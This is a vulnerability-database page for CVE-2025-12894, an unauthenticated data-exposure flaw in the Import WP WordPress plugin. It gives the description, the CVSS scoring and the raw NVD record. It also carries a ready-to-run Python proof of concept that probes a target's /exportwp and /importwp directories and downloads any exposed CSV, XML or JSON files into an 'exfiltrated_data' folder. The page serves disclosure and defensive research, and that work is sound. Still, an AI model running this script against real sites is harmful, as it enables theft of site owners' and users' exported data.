Security Vulnerability Report
中文
CVE-2025-12894 CVSS 5.3 MEDIUM

CVE-2025-12894

Published: 2025-11-21 08:15:54
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Import WP – Export and Import CSV and XML files to WordPress plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.14.17 via the import/export functionality and a lack of .htaccess protection. This makes it possible for unauthenticated attackers to extract sensitive data from exports stored in /exportwp and import data stored in /importwp.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Import WP (jc-importer) ≤ 2.14.17

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-12894 PoC - WordPress Import WP Sensitive Information Exposure # Target: WordPress site with Import WP plugin <= 2.14.17 import requests import sys from urllib.parse import urljoin def check_vulnerability(base_url): """Check if the target is vulnerable to CVE-2025-12894""" # Check exportwp directory export_url = urljoin(base_url, '/exportwp/') import_url = urljoin(base_url, '/importwp/') results = { 'exportwp_accessible': False, 'importwp_accessible': False, 'exported_files': [], 'imported_files': [] } try: # Try to access exportwp directory response = requests.get(export_url, timeout=10, verify=False) if response.status_code == 200: results['exportwp_accessible'] = True print(f"[+] exportwp directory is accessible at: {export_url}") # Try to enumerate files (basic listing check) if 'index of' in response.text.lower() or '<title>index of' in response.text.lower(): print(f"[!] Directory listing is enabled - sensitive files may be exposed") # Extract file references from response import re files = re.findall(r'href=["\'](.*?)["\']', response.text) results['exported_files'] = [f for f in files if f.endswith(('.csv', '.xml', '.json'))] # Try to access importwp directory response = requests.get(import_url, timeout=10, verify=False) if response.status_code == 200: results['importwp_accessible'] = True print(f"[+] importwp directory is accessible at: {import_url}") if 'index of' in response.text.lower() or '<title>index of' in response.text.lower(): print(f"[!] Directory listing is enabled - import files may be exposed") import re files = re.findall(r'href=["\'](.*?)["\']', response.text) results['imported_files'] = [f for f in files if f.endswith(('.csv', '.xml', '.json'))] return results except requests.RequestException as e: print(f"[-] Error: {e}") return None def download_exported_data(base_url, output_dir='./exfiltrated_data'): """Download exported files from vulnerable endpoint""" import os os.makedirs(output_dir, exist_ok=True) export_url = urljoin(base_url, '/exportwp/') try: response = requests.get(export_url, timeout=10, verify=False) if response.status_code == 200: import re files = re.findall(r'href=["\']([^"\']+\.(csv|xml|json))["\']', response.text) for filename, _ in files: file_url = urljoin(export_url, filename) print(f"[*] Downloading: {file_url}") file_response = requests.get(file_url, timeout=30, verify=False) if file_response.status_code == 200: local_path = os.path.join(output_dir, filename) with open(local_path, 'wb') as f: f.write(file_response.content) print(f"[+] Saved to: {local_path}") except Exception as e: print(f"[-] Download error: {e}") if __name__ == '__main__': if len(sys.argv) < 2: print("Usage: python cve_2025_12894_poc.py <target_url>") print("Example: python cve_2025_12894_poc.py http://example.com") sys.exit(1) target = sys.argv[1].rstrip('/') print(f"[*] Checking target: {target}") print(f"[*] Testing CVE-2025-12894 vulnerability...\n") results = check_vulnerability(target) if results: if results['exportwp_accessible'] or results['importwp_accessible']: print("\n[!] VULNERABLE - Sensitive directories are exposed") print("\n[*] Attempting to download exported data...") download_exported_data(target) else: print("\n[-] Target appears to be patched or not vulnerable")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12894", "sourceIdentifier": "[email protected]", "published": "2025-11-21T08:15:54.403", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Import WP – Export and Import CSV and XML files to WordPress plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.14.17 via the import/export functionality and a lack of .htaccess protection. This makes it possible for unauthenticated attackers to extract sensitive data from exports stored in /exportwp and import data stored in /importwp."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-552"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3394624%40jc-importer&new=3394624%40jc-importer&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/28ca9590-dc0b-40c9-9de6-1480094ea8be?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.